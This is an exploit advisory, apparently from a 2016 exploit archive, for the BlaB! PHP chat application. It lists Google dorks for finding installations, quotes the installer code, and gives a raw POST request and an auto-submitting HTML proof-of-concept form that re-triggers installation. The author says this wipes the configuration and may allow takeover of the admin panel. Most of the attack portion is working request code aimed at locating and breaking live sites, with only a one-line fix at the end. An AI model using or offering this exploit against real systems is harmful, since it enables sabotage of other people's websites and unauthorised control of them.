#@#@#@#@##@#@#@#@##@#@#@#@##@#@#@#@##@#@#@#@##@#@#@#@##@#@#@#@##@#@#@#@##@#@#@#@##@#@#@#@##@#@#@#@##@#@#@#@#
Title --> BlaB! - Configuration Deletion
Author --> bRpsd
Skype ID --> VEGNOX
Date --> 2/19/2016

Blab Official / Download Freeware --> http://hot-things.net/blab-lite-ajax-chat
Vulnerable versions --> All Versions So Far.
Tested Version --> 8.1 - Latest

Description :
"BlaB! is a web based chat written in PHP, using AJAX as a transport system and MySQL, SQLite or PostgreSQL as a database storage. The project started back in 2002 as a self-refreshing page called Simple Chat that can still be found on the Internet. There have been more that 200000 downloads ever since and about 12000 active installations, some of which transfering 10000 messages a day." 
#@#@#@#@##@#@#@#@##@#@#@#@##@#@#@#@##@#@#@#@##@#@#@#@##@#@#@#@##@#@#@#@##@#@#@#@##@#@#@#@##@#@#@#@##@#@#@#@#

|| Dorks ||

"Powered by BlaB! 8.1"

"Powered by BlaB!"

intext:Powered by BlaB!
-------------------------------------------------------------------------------------------------------------------------------

Affected Files : 
/install/index.php
/install/s2.inc


Code :
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
if(isset($_POST['sssalt'])){$config_dist=str_replace('salt=\'\'','salt=\''.$_POST['sssalt'].'\'',$config_dist);}
if(isset($_POST['dbtype'])){$config_dist=str_replace('dbss[\'type\']=\'\'','dbss[\'type\']=\''.$_POST['dbtype'].'\'',$config_dist);}
if(isset($_POST['dbsqlt'])){$config_dist=str_replace('dbss[\'sqlt\']=\'\'','dbss[\'sqlt\']=\''.$_POST['dbsqlt'].'\'',$config_dist);}
if(isset($_POST['dbhost'])){$config_dist=str_replace('dbss[\'host\']=\'\'','dbss[\'host\']=\''.$_POST['dbhost'].'\'',$config_dist);}
if(isset($_POST['dbname'])){$config_dist=str_replace('dbss[\'name\']=\'\'','dbss[\'name\']=\''.$_POST['dbname'].'\'',$config_dist);}
if(isset($_POST['dbuser'])){$config_dist=str_replace('dbss[\'user\']=\'\'','dbss[\'user\']=\''.$_POST['dbuser'].'\'',$config_dist);}
if(isset($_POST['dbpass'])){$config_dist=str_replace('dbss[\'pass\']=\'\'','dbss[\'pass\']=\''.$_POST['dbpass'].'\'',$config_dist);}
if(isset($_POST['prefix'])){$config_dist=str_replace('dbss[\'prfx\']=\'\'','dbss[\'prfx\']=\''.$_POST['prefix'].'\'',$config_dist);}
if($_POST['dbtype']=='mysql'){$config_dist=str_replace('?>',"error_reporting(1);\r\n?>",$config_dist);}

if(is_writable($config_file)){
$fd=fopen($config_file,'w');fwrite($fd,$config_dist);fclose($fd);$config_ok=1;}
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

By sending a simple POST DATA content with the variable (step) and value (2) the host will attempt to re-install the CMS with an empty configuration and the website will never work or / function , a successful attack might lead to overwrite the database [re-installation of the script] and take over the administration panel.

\\ POST REQUEST //

##########################################################################################################################
localhost/blab81/install/index.php

Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive

step=2
##########################################################################################################################

// HTML PROOF \\

<form action="http://localhost/blab81/install/index.php" method="POST">
<input type="hidden" name="step" value="2" />
<input type="submit" value="GO!" />
</form>



** SOLUTION ** 
- Remove the entire /install/ folder and you're good.

# siph0n [2016-02-22]